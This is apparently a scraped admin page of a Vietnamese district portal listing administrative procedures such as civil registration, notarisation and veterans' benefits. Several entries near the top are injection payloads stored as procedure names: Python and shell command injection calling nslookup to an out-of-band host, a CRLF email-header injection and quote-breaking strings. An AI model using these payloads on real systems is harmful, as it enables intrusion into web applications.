Quản lý Thủ Tục Hành Chính

Cơ quan thực hiện
Lĩnh vực
Từ khóa
STT Tên thủ tục Mức độ Cơ quan thực hiện
1 1 1 Cấp Quận
2 1 1 Cấp Quận
3 1 1 Cấp Quận
4 1 1 Cấp Quận
5 1 1 Cấp Quận
6 1 1 Cấp Quận
7 1 1 Cấp Quận
8 1 1 Cấp Quận
9 1 1 Cấp Quận
10 1 1 Cấp Quận
11 1 1 Cấp Quận
12 1 1 Cấp Quận
13 1 1 Cấp Quận
14 1 1 Cấp Quận
15 1 1 Cấp Quận
16 1 1 Cấp Quận
17 1 1 Cấp Quận
18 1 1 Cấp Quận
19 1 1 Cấp Quận
20 1 1 Cấp Quận

  Admin thu tuc hanh chinh

Cơ quan thực hiện
Lĩnh vực
Từ khóa
# Tên thủ tục Ngày tạo Trạng thái Thao tác
1801 set|set&set 1 Năm qua Đã đăng Xóa
1802 str(__import__('time').sleep(9))+__import__('os').popen('nslookup hity6JiwK6HQtad1fd.'+'bxss.me').read() 1 Năm qua Đã đăng Xóa
1803 to@example.com>%0d%0abcc:065618.14-84596.14.bbadc.18172.2@bxss.me 1 Năm qua Đã đăng Xóa
1804 \ 1 Năm qua Đã đăng Xóa
1805 `nslookup hitpXjEZVrgEXe0eea.bxss.me` 1 Năm qua Đã đăng Xóa
1806 |nslookup hitRrUGWlYN9f4bd20.bxss.me 1 Năm qua Đã đăng Xóa
1807 �''� 1 Năm qua Đã đăng Xóa
1808 �'�" 1 Năm qua Đã đăng Xóa
1809 Thủ tục 01: Đăng ký khai sinh có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1810 Thủ tục 02: Miễn nhiệm báo cáo viên pháp luật 4 Năm qua Đã đăng Xóa
1811 Thủ tục 02: Đăng ký kết hôn có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1812 Thủ tục 03: Thủ tục hành chính của UBND cấp huyện cơ quan thuộc Uỷ ban nhân dân cấp huyện, Cơ quan thi hành án dân sự cấp huyện về bồi thường nhà nước trong hoạt động quản lý hành chính và thi hành án dân sự. 4 Năm qua Đã đăng Xóa
1813 Thủ tục 03: Đăng ký khai tử có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1814 Thủ tục 3: Đăng ký thay đổi họ, tên, chữ đệm cho người từ 14 tuổi trở lên 4 Năm qua Đã đăng Xóa
1815 Thủ tục 04: Thực hiện hỗ trợ khi hòa giải viên gặp tai nạn hoặc rủi ro ảnh hưởng đến sức khỏe, tính mạng trong khi thực hiện hoạt động hòa giải (cấp huyện) 4 Năm qua Đã đăng Xóa
1816 Thủ tục 04: Đăng ký nhận cha, mẹ, con có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1817 Thủ tục 05: Đăng ký khai sinh kết hợp đăng ký nhận cha, mẹ, con có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1818 Thủ tục 10: Đăng ký giám hộ có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1819 Thủ tục 11: Đăng ký chấm dứt giám hộ có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1820 Thủ tục 12: Thay đổi, cải chính, bổ sung hộ tịch, xác định lại dân tộc 4 Năm qua Đã đăng Xóa
1821 Thủ tục 13: Ghi vào Sổ hộ tịch việc kết hôn của công dân Việt Nam đã được giải quyết tại cơ quan có thẩm quyền của nước ngoài 4 Năm qua Đã đăng Xóa
1822 Thủ tục 14: Ghi vào Sổ hộ tịch việc ly hôn, hủy việc kết hôn của công dân Việt Nam đã được giải quyết tại cơ quan có thẩm quyền của nước ngoài. 4 Năm qua Đã đăng Xóa
1823 Thủ tục 15: Ghi vào Sổ hộ tịch việc hộ tịch khác của công dân Việt Nam đã được giải quyết tại cơ quan có thẩm quyền của nước ngoài (khai sinh; giám hộ; nhận cha, mẹ, con; xác định cha, mẹ, con; nuôi con nuôi; khai tử; thay đổi hộ tịch). 4 Năm qua Đã đăng Xóa
1824 Thủ tục 16: Cấp bản sao giấy tờ hộ tịch từ sổ hộ tịch 4 Năm qua Đã đăng Xóa
1825 Thủ tục 16: Đăng ký lại khai sinh có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1826 Thủ tục 17: Đăng ký khai sinh có yếu tố nước ngoài cho người đã có hồ sơ, giấy tờ cá nhân 4 Năm qua Đã đăng Xóa
1827 Thủ tục 18: Đăng ký lại kết hôn có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1828 Thủ tục 19: Đăng ký lại khai tử có yếu tố nước ngoài 4 Năm qua Đã đăng Xóa
1829 Thủ tục 20: Cấp bản sao trích lục Hộ tịch 4 Năm qua Đã đăng Xóa
1830 Thủ tục 21: Cấp bản sao từ sổ gốc 4 Năm qua Đã đăng Xóa
1831 Thủ tục 22: Chứng thực bản sao từ bản chính giấy tờ, văn bản do cơ quan tổ chức có thẩm quyền của Việt Nam cấp hoặc chứng nhận 4 Năm qua Đã đăng Xóa
1832 Thủ tục 23: Chứng thực bản sao từ bản chính giấy tờ, văn bản do cơ quan, tổ chức có thẩm quyền của nước ngoài; cơ quan, tổ chức có thẩm quyền của Việt Nam liên kết với cơ quan, tổ chức có thẩm quyền của nước ngoài cấp hoặc chứng nhận 4 Năm qua Đã đăng Xóa
1833 Thủ tục 24: Chứng thực chữ ký trong các giấy tờ, văn bản (áp dụng cho cả trường hợp chứng thực điểm chỉ và trường hợp người yêu cầu chứng thực không thể ký, không thể điểm chỉ được) 4 Năm qua Đã đăng Xóa
1834 Thủ tục 25: Chứng thực việc sửa đổi, bổ sung, hủy bỏ hợp đồng, giao dịch 4 Năm qua Đã đăng Xóa
1835 Thủ tục 26: Sửa lỗi sai sót trong hợp đồng, giao dịch 4 Năm qua Đã đăng Xóa
1836 Thủ tục 27: Cấp bản sao có chứng thực từ bản chính hợp đồng, giao dịch đã được chứng thực 4 Năm qua Đã đăng Xóa
1837 Thủ tục 28: Chứng thực chữ ký người dịch mà người dịch là cộng tác viên dịch thuật của Phòng Tư pháp 4 Năm qua Đã đăng Xóa
1838 Thủ tục 29: Chứng thực chữ ký người dịch mà người dịch không phải là cộng tác viên dịch thuật 4 Năm qua Đã đăng Xóa
1839 Thủ tục 30: Chứng thực hợp đồng, giao dịch liên quan đến tài sản là động sản 4 Năm qua Đã đăng Xóa
1840 Thủ tục 31: Chứng thực văn bản thỏa thuận phân chia di sản mà di sản là động sản 4 Năm qua Đã đăng Xóa
1841 Thủ tục 32: Chứng thực văn bản khai nhận di sản mà di sản là động sản 4 Năm qua Đã đăng Xóa
1842 Thủ tục 3: Phê duyệt điều lệ hội có phạm vi hoạt động trong phường 4 Năm qua Đã đăng Xóa
1843 Thủ tục 4: Cho phép đổi tên hội có phạm vi hoạt động trong phường 4 Năm qua Đã đăng Xóa
1844 Thủ tục 5: Chia, tách, sáp nhập, hợp nhất hội có phạm vi hoạt động trong phường 4 Năm qua Đã đăng Xóa
1845 Thủ tục 6: Tự giải thể Hội có phạm vi hoạt động trong phường 4 Năm qua Đã đăng Xóa
1846 Thủ tục 7: Cho phép Hội có phạm vi hoạt động trong phường tổ chức Đại hội nhiệm kỳ và Đại hội bất thường 4 Năm qua Đã đăng Xóa
1847 Thủ tục 8: Báo cáo việc thành lập pháp nhân thuộc Hội có phạm vi hoạt động trong phường. 4 Năm qua Đã đăng Xóa
1848 Thủ tục 9: Báo cáo việc thay đổi địa chỉ nơi đặt trụ sở Hội có phạm vi hoạt động trong phường. 4 Năm qua Đã đăng Xóa
1849 Thủ tục 10: Cấp đăng ký cho Hội đoàn tôn giáo có phạm vi hoạt động trong quận. 4 Năm qua Đã đăng Xóa
1850 Thủ tục 11: Cấp đăng ký cho Dòng tu, tu viện hoặc các tổ chức tu hành tập thể khác có phạm vi hoạt động trong quận. 4 Năm qua Đã đăng Xóa
1851 Thủ tục 12: Tiếp nhận thông báo thuyên chuyển nơi hoạt động tôn giáo của chức sắc, nhà tu hành. 4 Năm qua Đã đăng Xóa
1852 Thủ tục14: Chấp thuận hoạt động tôn giáo ngoài chương trình đăng ký hàng năm có sự tham gia của tín đồ trong phạm vi quận. 4 Năm qua Đã đăng Xóa
1853 Thủ tục15: Chấp thuận tổ chức Hội nghị thường niên, Đại hội của tổ chức tôn giáo cơ sở. 4 Năm qua Đã đăng Xóa
1854 Thủ tục16: Chấp thuận việc tổ chức cuộc lễ diễn ra ngoài cơ sở tôn giáo có sự tham gia của tín đồ trong phạm vi quận. 4 Năm qua Đã đăng Xóa
1855 Thủ tục 17: Chấp thuận việc giảng đạo, truyền đạo của chức sắc, nhà tu hành ngoài cơ sở tôn giáo. 4 Năm qua Đã đăng Xóa
1856 Thủ tục 18: Chấp thuận việc tổ chức quyên góp của cơ sở tín ngưỡng, tôn giáo vượt ra ngoài phạm vi một phường trong phạm vi quận. 4 Năm qua Đã đăng Xóa
1857 Thủ tục 19: Tặng Giấy khen của chủ tịch UBND quận về thực hiện nhiệm vụ chính trị 4 Năm qua Đã đăng Xóa
1858 Thủ tục 20: Tặng danh hiệu “Tập thể Lao động tiên tiến” 4 Năm qua Đã đăng Xóa
1859 Thủ tục 21: Tặng danh hiệu “Tổ dân phố văn hoá” 4 Năm qua Đã đăng Xóa
1860 Thủ tục 22: Tặng danh hiệu “Chiến sỹ thi đua cơ sở” 4 Năm qua Đã đăng Xóa
1861 Thủ tục 23: Tặng danh hiệu “Lao động tiên tiến” 4 Năm qua Đã đăng Xóa
1862 Thủ tục 24: Tặng Giấy khen của Chủ tịch UBND quận về thành tích thi đua theo đợt, chuyên đề 4 Năm qua Đã đăng Xóa
1863 Thủ tục 24: Tặng Giấy khen của Chủ tịch UBND quận về thành tích đột xuất 4 Năm qua Đã đăng Xóa
1864 Thủ tục 26: Tặng Giấy khen của Chủ tịch UBND quận về khen thưởng đối ngoại 4 Năm qua Đã đăng Xóa
1865 Thủ tục 02: Thẩm định hồ sơ đề nghị tặng hoặc truy tặng danh hiệu vinh dự nhà nước “Bà mẹ Việt Nam Anh hùng” 4 Năm qua Đã đăng Xóa
1866 Thủ tục 03: Giải quyết hồ sơ đề nghị cấp thẻ bảo hiểm y tế đối với người có công với cách mạng và thân nhân người có công với cách mạng. 4 Năm qua Đã đăng Xóa
1867 Thủ tục 05: Thẩm định hồ sơ đề nghị cấp lại Bằng "Tổ quốc ghi công" 4 Năm qua Đã đăng Xóa
1868 Thủ tục 06: Thẩm định hồ sơ cấp lại giấy chứng nhận thương binh, bệnh binh, gia đình liệt sỹ 4 Năm qua Đã đăng Xóa
1869 Thủ tục 07: Thẩm định hồ sơ đề nghị cấp Quyết định trợ cấp ưu đãi giáo dục, đào tạo đối với học sinh, sinh viên là người có công với cách mạng và con của họ 4 Năm qua Đã đăng Xóa
1870 Thủ tục 08: Xét duyệt tổng hợp trợ cấp ưu đãi giáo dục, đào tạo 4 Năm qua Đã đăng Xóa
1871 Thủ tục 09: Thẩm định hồ sơ đề nghị giải quyết chế độ cho người HĐKC bị nhiễm chất độc hoá học và con đẻ của họ 4 Năm qua Đã đăng Xóa
1872 Thủ tục 11: Thủ tục di chuyển hồ sơ người có công với Cách mạng 4 Năm qua Đã đăng Xóa
1873 Thủ tục 12: Thẩm định hồ sơ đề nghị giải quyết chế độ mai táng phí đối với Cựu chiến binh từ trần 4 Năm qua Đã đăng Xóa
1874 Thủ tục 13: Thẩm định hồ sơ đề nghị giải quyết chế độ trợ cấp một lần và mai táng phí đối với người có công với cách mạng từ trần 4 Năm qua Đã đăng Xóa
1875 Thủ tục 14: Thẩm định hồ sơ đề nghị giải quyết trợ cấp đối với người hoạt động cách mạng, hoạt động kháng chiến bị địch bắt tù đày và thân nhân người hoạt động kháng chiến giải phóng dân tộc chết trước ngày 01/01/1995. 4 Năm qua Đã đăng Xóa
1876 Thủ tục 15: Thẩm định hồ sơ đề nghị giải quyết chế độ người có công giúp đỡ cách mạng đã được khen thưởng. 4 Năm qua Đã đăng Xóa
1877 Thủ tục 16: Thẩm định hồ sơ đề nghị giải quyết chính sách đối với vợ (chồng) liệt sỹ tái giá 4 Năm qua Đã đăng Xóa
1878 Thủ tục 17: Thăm viếng hoặc di chuyển hài cốt liệt sỹ 4 Năm qua Đã đăng Xóa
1879 Thủ tục 18: Tiếp nhận hồ sơ người có công với Cách mạng 4 Năm qua Đã đăng Xóa
1880 Thủ tục 19: Thẩm định hồ sơ đề nghị giải quyết chế độ trang cấp dụng cụ chỉnh hình đối với người có công với cách mạng 4 Năm qua Đã đăng Xóa
1881 Thủ tục 20: Thẩm định hồ sơ đề nghị giải quyết chế độ đối với thân nhân liệt sỹ 4 Năm qua Đã đăng Xóa
1882 Thủ tục 21: Thẩm định hồ sơ đề nghị xác nhận liệt sỹ 4 Năm qua Đã đăng Xóa
1883 Thủ tục 22: Chứng nhận người có công với cách mạng và con của họ 4 Năm qua Đã đăng Xóa
1884 Thủ tục 23: Thẩm định hồ sơ đề nghị giải quyết chế độ đối với người hoạt động kháng chiến giải phóng dân tộc 4 Năm qua Đã đăng Xóa
1885 Thủ tục 24: Xác nhận đơn đề nghị sao lục hồ sơ người có công 4 Năm qua Đã đăng Xóa
1886 Thủ tục 25: Thẩm định hồ sơ xác nhận Thương binh 4 Năm qua Đã đăng Xóa
1887 Thủ tục 26: Thẩm định hồ sơ xin xác nhận doanh nghiệp, Hợp tác xã là cơ sở sản xuất của thương, bệnh binh 4 Năm qua Đã đăng Xóa
1888 Thủ tục 27: Đề nghị tiếp nhận vào Trung tâm nuôi dưỡng và điều dưỡng người có công trực thuộc Sở 4 Năm qua Đã đăng Xóa
1889 Thủ tục 28: Thẩm định hồ sơ đề nghị giải quyết chế độ tuất Người có công với cách mạng từ trần 4 Năm qua Đã đăng Xóa
1890 Thủ tục 29: Thẩm định hồ sơ đề nghị giải quyết chế độ BHYT theo Quyết định 290/2005/QĐ-TTg đối với những trường hợp tham gia kháng chiến nhưng chưa được hưởng chế độ ưu đãi 4 Năm qua Đã đăng Xóa
1891 Thủ tục 30: Thẩm định hồ sơ đề nghị giải quyết chế độ mai táng phí theo Quyết định 290/QĐ-TTg đối với những trường hợp tham gia kháng chiến nhưng chưa được hưởng chế độ ưu đãi. 4 Năm qua Đã đăng Xóa
1892 Thủ tục 31: Thẩm định hồ sơ đề nghị giải quyết chế độ đối với lực lượng thanh niên xung phong 4 Năm qua Đã đăng Xóa
1893 Thủ tục 32: Cấp thẻ bảo hiểm y tế thành viên hộ nghèo, cận nghèo. 4 Năm qua Đã đăng Xóa
1894 Thủ tục 33: Thẩm định hồ sơ đề nghị tiếp nhận đối tượng Bảo trợ xã hội vào trung tâm bảo trợ xã hội 4 Năm qua Đã đăng Xóa
1895 Thủ tục 34: Cấp lại sổ trợ cấp xã hội thường xuyên 4 Năm qua Đã đăng Xóa
1896 Thủ tục 35: Thẩm định hồ sơ cấp thẻ đi xe buýt miễn phí cho người có công với cách mạng, người tàn tật 4 Năm qua Đã đăng Xóa
1897 Thủ tục 36: Thẩm định hồ sơ đề nghị giải quyết trợ cấp một lần đối với người được cử làm chuyên gia sang giúp Lào và Campuchia 4 Năm qua Đã đăng Xóa
1898 Thủ tục 37: Hỗ trợ kinh phí mai táng đối với người gặp rủi ro ngoài vùng cư trú bị chết a. Trình tự thực hiện: 4 Năm qua Đã đăng Xóa
1899 Thủ tục 38: Cứu trợ xã hội đột xuất 4 Năm qua Đã đăng Xóa
1900 Thủ tục 39: Xác nhận doanh nghiệp, hộ gia đình, HTX là cơ sở sản xuất kinh doanh dành riêng cho người tàn tật 4 Năm qua Đã đăng Xóa